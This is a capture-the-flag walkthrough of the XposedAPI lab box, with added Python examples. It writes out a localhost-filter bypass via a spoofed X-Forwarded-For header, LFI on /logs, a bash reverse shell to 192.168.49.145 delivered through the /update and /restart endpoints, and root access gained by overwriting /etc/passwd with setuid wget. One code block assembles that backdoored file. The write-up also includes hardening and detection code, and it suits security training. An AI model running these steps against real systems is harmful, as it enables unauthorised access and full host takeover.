
PG: XposedAPI | Walkthrough

November 28, 2021

Enumeration

Start with an Nmap scan of the open ports (-sV for version detection, -sC for default scripts):

$ nmap $ip -p22,13337 -sVC
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
13337/tcp open http Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Remote Software Management API
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.65 seconds

Exploitation

  • LFI: /logs?file=/etc/passwd reads arbitrary files. The endpoint sits behind a filter that only admits local clients, and the filter is bypassed by adding the header X-Forwarded-For: 127.0.0.1, which means it reads the client address from that header instead of from the TCP connection.
  • /update: the API downloads a file from a user-supplied URL. Host a reverse shell on the attacker machine (192.168.49.145 here, with a listener on port 80) and point the updater at it. Despite its name, shell.elf is a bash script:

┌──(imtodess㉿deathnote)-[~/ctf/pg/xposedapi/exploit]
└─$ cat shell.elf
#!/bin/bash
bash -i >& /dev/tcp/192.168.49.145/80 0>&1

POST /update HTTP/1.1
Host: 192.168.145.134:13337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 63

{"user":"clumsyadmin", "url":"http://192.168.49.145/shell.elf"}

  • /restart: restarting the managed software executes the file just downloaded, and the reverse shell comes back as clumsyadmin:

POST /restart HTTP/1.1
Host: 192.168.145.134:13337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
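Why the X-Forwarded-For trick and the file parameter work, and what the fixes look like. This is an added example written for this page, not code from the XposedAPI target or from the walkthrough: the API's source is not shown, so the function names, the trusted-proxy set and the log directory below are assumptions. It contrasts the two flawed checks the /logs bypass implies (client address taken from a client-controlled header; file name used as an arbitrary path) with hardened versions, run over constructed requests.

```python
import os
from typing import FrozenSet, Mapping, Optional

LOCAL_ADDRS = frozenset({"127.0.0.1", "::1"})
LOG_DIR = "/var/log/xposedapi"   # assumed location of the legitimate log files


def client_ip_vulnerable(remote_addr: str, headers: Mapping[str, str]) -> str:
    """The pattern the bypass implies: any client may claim any address by
    sending X-Forwarded-For, and the leftmost value is believed."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(remote_addr: str, headers: Mapping[str, str],
                       trusted_proxies: FrozenSet[str] = frozenset()) -> str:
    """Believe X-Forwarded-For only when the TCP peer is one of our own
    proxies, and then take the rightmost hop that is not a proxy: that is
    the address the proxy appended, not the one the client put at the front."""
    if remote_addr not in trusted_proxies:
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if hop not in trusted_proxies:
            return hop
    return remote_addr


def logs_allowed(remote_addr: str, headers: Mapping[str, str], hardened: bool,
                 trusted_proxies: FrozenSet[str] = frozenset()) -> bool:
    """Localhost-only gate in front of /logs, in both variants."""
    if hardened:
        ip = client_ip_hardened(remote_addr, headers, trusted_proxies)
    else:
        ip = client_ip_vulnerable(remote_addr, headers)
    return ip in LOCAL_ADDRS


def log_path_vulnerable(requested: str, base: str = LOG_DIR) -> str:
    """The LFI: the file parameter is used as a path as given. os.path.join
    discards base entirely when the second component is absolute."""
    return os.path.join(base, requested)


def log_path_hardened(requested: str, base: str = LOG_DIR) -> Optional[str]:
    """Resolve the request under the log directory and refuse anything that
    does not stay inside it once ../ and symlinks are resolved."""
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, requested.lstrip("/")))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate
```

With the hardened gate, a spoofed header from 192.168.49.145 is ignored because that peer is not a trusted proxy, and even through a trusted proxy the client's "127.0.0.1" is discarded in favour of the hop the proxy appended.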

Privilege Escalation

SUID | Wget

List the setuid binaries. Everything else here is standard for Debian 10; /usr/bin/wget is not normally setuid and is the odd one out:

clumsyadmin@xposedapi:~$ find / -type f -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/wget
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd

Replace the /etc/passwd

wget is setuid root, so whatever it writes with -O is written as root, /etc/passwd included. Take a copy of the target's /etc/passwd (the LFI already leaked it), append a uid-0 user whose password hash you know (BKLzEP1rEQre2 is a 13-character traditional crypt(3) hash), host the file on the attacker machine and fetch it over the real one. wget -O replaces the whole file, so the copy must keep every original entry, or existing accounts, including the one you are logged in as, stop resolving. Because the hash sits in the password field instead of x, su checks it against /etc/passwd rather than /etc/shadow:

clumsyadmin@xposedapi:~$ wget http://192.168.49.145/passwd -O /etc/passwd
clumsyadmin@xposedapi:~$ cat /etc/passwd
<snip>
newroot:BKLzEP1rEQre2:0:0::/root:/bin/bash
clumsyadmin@xposedapi:~$ su newroot
Password:
root@xposedapi:/home/clumsyadmin# cd /root
root@xposedapi:~# ls
proof.txt
root@xposedapi:~# cat proof.txt
589015e8b797f2d3bff1f16cc11b58c9
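Assembling the replacement passwd file, and spotting the result afterwards. This is an added example for this page, not the walkthrough's own tooling: the passwd contents below are constructed, and the hash is the 13-character crypt(3) string shown above (producing a hash for your own password is done with crypt(3) or openssl passwd and is outside this code). The first function builds the file the overwrite needs while keeping every original entry intact; the last two are the checks a defender runs over the same file to find what was done.

```python
from typing import List, Tuple

# Constructed stand-in for the target's /etc/passwd as leaked through the LFI.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "sshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n"
    "clumsyadmin:x:1000:1000::/home/clumsyadmin:/bin/bash\n"
)

LOCK_MARKERS = ("x", "*", "!", "!!")   # shadow marker and the usual locked-account markers

Entry = Tuple[str, str, int, int, str, str, str]


def parse_passwd(text: str) -> List[Entry]:
    """Split passwd(5) lines into (name, passwd, uid, gid, gecos, home, shell).
    A malformed line is an error: a broken /etc/passwd can lock everyone out."""
    entries: List[Entry] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append((name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def add_uid0_user(original: str, name: str, pw_hash: str,
                  shell: str = "/bin/bash") -> str:
    """Return the file to host for 'wget -O /etc/passwd': the original text
    unchanged, plus one uid 0 / gid 0 entry. The hash goes in field 2 instead
    of 'x', so su checks it against this file rather than /etc/shadow."""
    if ":" in name or ":" in pw_hash:
        raise ValueError("name and hash must not contain ':'")
    if any(e[0] == name for e in parse_passwd(original)):
        raise ValueError(f"user {name!r} already exists")
    new_line = f"{name}:{pw_hash}:0:0::/root:{shell}"
    return original.rstrip("\n") + "\n" + new_line + "\n"


def uid0_accounts(text: str) -> List[str]:
    """Defender check: every account with uid 0. Anything besides root is a backdoor."""
    return [e[0] for e in parse_passwd(text) if e[2] == 0]


def weak_password_field_accounts(text: str) -> List[str]:
    """Defender check: accounts whose password field is neither the shadow
    marker nor a lock marker, i.e. a world-readable hash or an empty password."""
    return [e[0] for e in parse_passwd(text) if e[1] not in LOCK_MARKERS]
```

Run against the constructed file, the backdoored copy parses to one more entry than the original, uid0_accounts reports root and newroot, and weak_password_field_accounts flags only newroot, which is exactly what a file-integrity alert on /etc/passwd should surface after this technique.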